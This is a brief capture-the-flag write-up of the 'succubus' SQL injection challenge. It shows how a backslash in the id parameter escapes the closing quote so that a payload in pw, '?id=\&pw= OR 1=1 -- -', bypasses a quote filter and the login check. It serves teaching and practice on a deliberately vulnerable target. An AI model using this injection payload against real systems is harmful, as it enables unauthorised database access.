succubus
We are provided with the SQL query:
SELECT id FROM prob_succubus WHERE id='{$_GET[id]}' AND pw='{$_GET[pw]}'
We cannot use single or double quotes in this challenge. Therefore, we need to find another way to modify the existing query.
Let's provide the following URI parameter:
?id=\
The resultant query becomes:
SELECT id FROM prob_succubus WHERE id='\' AND pw='{$_GET[pw]}'
As we can see, now the \' AND pw=
part is being treated as a string. This is because the \
character escapes the following character which was the closing single quote.
Anything we insert into the ?pw
parameter will thus be treated as code.
If we provide the following URI parameter:
?id=\&pw= OR 1=1 -- -
The resultant query becomes:
SELECT id FROM prob_succubus WHERE id='\' AND pw=' OR 1=1 -- -'